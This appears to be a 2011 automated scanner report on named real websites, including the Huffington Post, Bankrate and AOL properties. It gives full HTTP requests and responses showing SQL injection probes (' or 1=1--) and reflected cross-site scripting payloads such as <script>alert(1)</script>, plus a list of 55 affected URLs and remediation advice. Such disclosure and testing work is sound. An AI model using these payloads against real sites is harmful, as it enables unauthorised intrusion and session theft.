XSS, SQL Injection, HTTP Header Injection, Insecure Configuration, Information Disclsoure, GHDB DORK Report 05052011-01

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://www.huffingtonpost.com/ [name of an arbitrarily supplied request parameter] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.huffingtonpost.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?icid=navbar_huffpo_main5&1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=28
Date: Thu, 05 May 2011 01:16:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
HPAds.ads_client_info() + ';load_mode=inline;page_type=homepage;pos=pushdown;dcopt=ist;u=970x418|homepage|pushdown|||' + HPAds.ads_u_value() + '||||' + HPAds.ads_inf_value() + ';sz=970x418;tile=1;ord=47570434?"></scr' + 'ipt>';
                       if(HuffCookies.getCookie('is_aol_user')=="1" && ad_code.match(/mid_article/gi))
                       {
                           var adSonarArray = {
                               'default':[1517286,2255770],
                               'entertainment':[1517280,2259767],
                               'politics':[1517131,2259768],
                               'business':[1517131,2259768],
                               'sports':[1517295,2259769],
                               'travel':[1517304,2259770]
                               }
                               document.write('<style type=\"text/css\">#ad_mid_article {float:left;width:300px;margin:10px 10px 10px 0} .mid_article_ad_label {display:none} #mid_article_deco {border:none;margin:0;padding:0}</style>');
                               if(adSonarArray[HPConfig.current_vertical_name]){
                                   HPAds.adSonar(adSonarArray[HPConfig.current_vertical_name][0],adSonarArray[HPConfig.current_vertical_name][1],300,250)
                               }
                               else{
                                   HPAds.adSonar(adSonarArray['default'][0],adSonarArray['default'][1],300,250)
                               }
                       }
    else if(!(HuffCookies.getCookie('is_aol_user')=="1" && (ad_code.match(/left_lower/gi) || ad_code.match(/pushdown/gi) || ad_code.match(/curtain/gi) )))
{
   document.write(supress_keyvalues(ks, ad_code));
}
var debugadcode = '';
document.write(debugadcode);
}
</script></div> <script type="text/javascript">
QV.place_quickread_ads = true;
</script>

<div class="main_big_news_ontop" id="topnav_big_news_module">

<div id="big_news_update">
<ul class="big_news_ontop">
<li ><a href="/big-news/#homepage" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');" class="title">BIG NEWS:</a></li>
<li><a href="/news/gingrich-2012" class="big_news_item first" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');">Gingrich 2012</a></li>
<li class='line'>|</li>
<li><a href="/news/elections-2012" class="big_news_item bn_v_politics" onclick="HPTrack.trackPageview('/t/a/top
...[SNIP]...

Request 2

GET /?icid=navbar_huffpo_main5&1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=29
Date: Thu, 05 May 2011 01:16:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
HPAds.ads_client_info() + ';load_mode=inline;page_type=homepage;pos=pushdown;dcopt=ist;u=970x418|homepage|pushdown|||' + HPAds.ads_u_value() + '||||' + HPAds.ads_inf_value() + ';sz=970x418;tile=1;ord=78811701?"></scr' + 'ipt>';
                       if(HuffCookies.getCookie('is_aol_user')=="1" && ad_code.match(/mid_article/gi))
                       {
                           var adSonarArray = {
                               'default':[1517286,2255770],
                               'entertainment':[1517280,2259767],
                               'politics':[1517131,2259768],
                               'business':[1517131,2259768],
                               'sports':[1517295,2259769],
                               'travel':[1517304,2259770]
                               }
                               document.write('<style type=\"text/css\">#ad_mid_article {float:left;width:300px;margin:10px 10px 10px 0} .mid_article_ad_label {display:none} #mid_article_deco {border:none;margin:0;padding:0}</style>');
                               if(adSonarArray[HPConfig.current_vertical_name]){
                                   HPAds.adSonar(adSonarArray[HPConfig.current_vertical_name][0],adSonarArray[HPConfig.current_vertical_name][1],300,250)
                               }
                               else{
                                   HPAds.adSonar(adSonarArray['default'][0],adSonarArray['default'][1],300,250)
                               }
                       }
    else if(!(HuffCookies.getCookie('is_aol_user')=="1" && (ad_code.match(/left_lower/gi) || ad_code.match(/pushdown/gi) || ad_code.match(/curtain/gi) )))
{
   document.write(supress_keyvalues(ks, ad_code));
}
var debugadcode = '';
document.write(debugadcode);
}
</script></div> <script type="text/javascript">
QV.place_quickread_ads = true;
</script>

<div class="main_big_news_ontop" id="topnav_big_news_module">

<div id="big_news_update">
<ul class="big_news_ontop">
<li ><a href="/big-news/#homepage" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');" class="title">BIG NEWS:</a></li>
<li><a href="/news/gingrich-2012" class="big_news_item first" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');">Gingrich 2012</a></li>
<li class='line'>|</li>
<li><a href="/news/elections-2012" class="big_news_item bn_v_politics" onclick="HPTrack.trackPageview('/t/a/top
...[SNIP]...

1.2. http://www.huffingtonpost.com/threeup.php [v parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.huffingtonpost.com
Path:	/threeup.php

Issue detail

The v parameter appears to be vulnerable to SQL injection attacks. The payloads 83591090'%20or%201%3d1--%20 and 83591090'%20or%201%3d2--%20 were each submitted in the v parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /threeup.php?threeup=yes&VerticalName=World&entry_id=857568&v=183591090'%20or%201%3d1--%20&h=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.10.10.1304575105; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:30:40 GMT
Connection: close
Content-Length: 7160

       <div id="857693" class="grid third flush_top threeup_entries">
           <div id="entry_857693" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/libya-government-shelling_n_857693.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273918/thumbs/r-LIBYA-INTERNATIONAL-AID-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/libya-government-shelling_n_857693.html" class="threeup_titles block margin_0_20" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">LIBYA TARGETS AID SHIP</a></h5>
           </div>
       </div>        <div id="857719" class="grid third flush_top threeup_entries">
           <div id="entry_857719" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-photos_n_857719.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273951/thumbs/r-OSAMA-BIN-LADEN-PHOTOS-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-photos_n_857719.html" class="threeup_titles block margin_0_20" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">GRAPHIC: Photos Show 3 Dead Men At Bin Laden Compound</a></h5>
           </div>
       </div>        <div id="857555" class="grid third flush_top threeup_entries">
           <div id="entry_857555" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/afghanistan-pakistan-bin-laden_n_857555.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273798/thumbs/r-AFGHANISTAN-PAKISTAN-BIN-LADEN-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/afghan
...[SNIP]...

Request 2

GET /threeup.php?threeup=yes&VerticalName=World&entry_id=857568&v=183591090'%20or%201%3d2--%20&h=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.10.10.1304575105; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:30:40 GMT
Connection: close
Content-Length: 6018

       <div id="857597" class="grid third flush_top threeup_entries">
           <div id="entry_857597" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html?ir=World" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');">            <img src="http://i.huffpost.com/gen/273847/thumbs/r-BIN-LADEN-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html?ir=World" class="threeup_titles block margin_0_20" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');">CNN Poll Finds That Most People Think Bin Laden Is In Hell</a></h5>
           </div>
       </div>        <div id="entry_threeup_central" class="grid third flush_top threeup_entries">
           <div id="entry_threeup_central_inner" class="entry no_border world">
               <div class="image_wrapper">                    <a href="/world/" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');"><img src="http://i.huffpost.com/gen/273918/thumbs/s-LIBYA-INTERNATIONAL-AID-97x75.jpg" border=0 width=97 height=75 style="display:inline" /></a>                    <a href="/world/" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');"><img src="http://i.huffpost.com/gen/273951/thumbs/s-OSAMA-BIN-LADEN-PHOTOS-97x75.jpg" border=0 width=97 height=75 style="display:inline" /></a>                    <a href="/world/" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');"><img src="http://i.huffpost.com/gen/273798/thumbs/s-AFGHANISTAN-PAKISTAN-BIN-LADEN-97x75.jpg" border=0 width=97 height=75 style="display:inline" /></a>                </div>
               <h5><a href="/world/" target="_top">More In World:</a> <a href="/world/" target="_top" class="threeup_titles" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');">                    Libya Targets Aid Arrival...                    Bin Laden Raid Photos...                    Pakistan Had To Know?...                    </a>
               </h5>
           </div>
       </div>        <div id="857624" clas
...[SNIP]...

2. Cross-site scripting (reflected) previous next
There are 55 instances of this issue:

http://www.aolnews.com/category/goodnews/ [REST URL parameter 2]
http://www.bankrate.com/funnel/mortgages/ [name of an arbitrarily supplied request parameter]
http://www.citysbest.com/ [icid parameter]
http://www.citysbest.com/ [name of an arbitrarily supplied request parameter]
http://www.citysbest.com/traffic/ [REST URL parameter 1]
http://www.citysbest.com/traffic/ [REST URL parameter 1]
http://www.dailyfinance.com/markets/mostactives [REST URL parameter 2]
http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx [REST URL parameter 2]
http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx [name of an arbitrarily supplied request parameter]
http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx [REST URL parameter 3]
http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx [name of an arbitrarily supplied request parameter]
http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx [REST URL parameter 3]
http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx [name of an arbitrarily supplied request parameter]
http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx [REST URL parameter 3]
http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx [name of an arbitrarily supplied request parameter]
http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]
http://www.huffingtonpost.com/ [icid parameter]
http://www.huffingtonpost.com/ [name of an arbitrarily supplied request parameter]
http://www.huffingtonpost.com/2011/05/02/ [name of an arbitrarily supplied request parameter]
http://www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html [name of an arbitrarily supplied request parameter]
http://www.huffingtonpost.com/2011/05/04/ [name of an arbitrarily supplied request parameter]
http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html [name of an arbitrarily supplied request parameter]
http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html [name of an arbitrarily supplied request parameter]
http://www.huffingtonpost.com/ads/check_flights.php [name of an arbitrarily supplied request parameter]
http://www.huffingtonpost.com/ads/check_flights.php [spot parameter]
http://www.huffingtonpost.com/advertise/ [name of an arbitrarily supplied request parameter]
http://www.huffingtonpost.com/badge/badges_json_v2.php [cb parameter]
http://www.huffingtonpost.com/badge/badges_json_v2.php [gn parameter]
http://www.huffingtonpost.com/badge/badges_json_v2.php [sn parameter]
http://www.huffingtonpost.com/permalink-tracker.html [vertical parameter]
http://www.huffingtonpost.com/users/logout/ [name of an arbitrarily supplied request parameter]
http://www.marketwatch.com/News/Story/Story.aspx [REST URL parameter 1]
http://www.marketwatch.com/News/Story/Story.aspx [REST URL parameter 2]
http://www.mmafighting.com/ [name of an arbitrarily supplied request parameter]
http://www.mmafighting.com/ [name of an arbitrarily supplied request parameter]
http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ [name of an arbitrarily supplied request parameter]
http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ [name of an arbitrarily supplied request parameter]
http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [icid parameter]
http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [icid parameter]
http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [name of an arbitrarily supplied request parameter]
http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [name of an arbitrarily supplied request parameter]
http://www.moviefone.com/ [name of an arbitrarily supplied request parameter]
http://www.pageflakes.com/subscribe.aspx [REST URL parameter 1]
http://www.pageflakes.com/subscribe.aspx [name of an arbitrarily supplied request parameter]
http://www.popeater.com/ [name of an arbitrarily supplied request parameter]
http://www.tuaw.com/hub/app-reviews [name of an arbitrarily supplied request parameter]
https://www.godaddy.com/gdshop/hosting/landing.asp [User-Agent HTTP header]
https://www.godaddy.com/gdshop/registrar/search.asp [User-Agent HTTP header]
https://www.godaddy.com/gdshop/website.asp [User-Agent HTTP header]
http://www.aol.com/ [dlact cookie]
http://www.aol.com/ [rrpmo1 cookie]
http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259 [REST URL parameter 3]
http://www.facebook.com/people/Bucky-Jordan%20/100000824820783 [REST URL parameter 3]
http://www.facebook.com/people/Bucky-Jordan/100000824820783 [REST URL parameter 3]
http://www.facebook.com/people/Bucky-Jordan/100000824820783/x22 [REST URL parameter 4]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://www.aolnews.com/category/goodnews/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.aolnews.com
Path:	/category/goodnews/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c033e"%3bf7c25182fc9 was submitted in the REST URL parameter 2. This input was echoed as c033e";f7c25182fc9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /category/goodnewsc033e"%3bf7c25182fc9/ HTTP/1.1
Host: www.aolnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:20 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:56:20 GMT; path=/
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 86979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
channel="us.news";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,aolnews.com";
s_265.mmxgo = true;
s_265.prop1="";
s_265.prop2="main";
s_265.prop12="http://www.aolnews.com/category/goodnewsc033e";f7c25182fc9/";
s_265.prop18="goodnewsc033e\";f7c25182fc9";
s_265.prop19="";
s_265.prop20="";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.2. http://www.bankrate.com/funnel/mortgages/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bankrate.com
Path:	/funnel/mortgages/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7abf6"style%3d"x%3aexpression(alert(1))"ef43b8923ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7abf6"style="x:expression(alert(1))"ef43b8923ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /funnel/mortgages/?7abf6"style%3d"x%3aexpression(alert(1))"ef43b8923ec=1 HTTP/1.1
Host: www.bankrate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Servername: a-brmweb03
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 1.7.0
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 10:56:22 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 10:56:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 46805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link type="text/css"
...[SNIP]...
<link rel="canonical" href="http://www.bankrate.com/funnel/mortgages/?7abf6"style="x:expression(alert(1))"ef43b8923ec=1" />
...[SNIP]...

2.3. http://www.citysbest.com/ [icid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.citysbest.com
Path:	/

Issue detail

The value of the icid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89199"><script>alert(1)</script>cd5f8e88860 was submitted in the icid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?icid=navbar_citysbest_main589199"><script>alert(1)</script>cd5f8e88860 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:46 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:58:46 GMT; path=/
Content-Type: text/html
Content-Length: 15674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/?icid=navbar_citysbest_main589199"><script>alert(1)</script>cd5f8e88860"/>
...[SNIP]...

2.4. http://www.citysbest.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.citysbest.com
Path:	/

Issue detail

